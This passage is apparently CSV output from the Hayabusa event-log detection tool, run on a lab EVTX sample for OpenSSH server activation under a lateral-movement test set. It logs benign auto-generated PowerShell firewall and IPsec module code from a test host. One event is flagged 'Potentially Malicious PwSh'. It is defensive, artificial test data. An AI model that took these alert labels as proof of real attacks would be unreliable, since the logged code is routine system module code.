Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if 
(-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.661 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.661 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.662 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH 
server activation and config.evtx +2021-04-22 10:19:38.662 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.662 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.663 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.663 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet"" 
ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.664 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.700 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' -Alias '*' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.700 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function 
__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' -Alias '*' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] 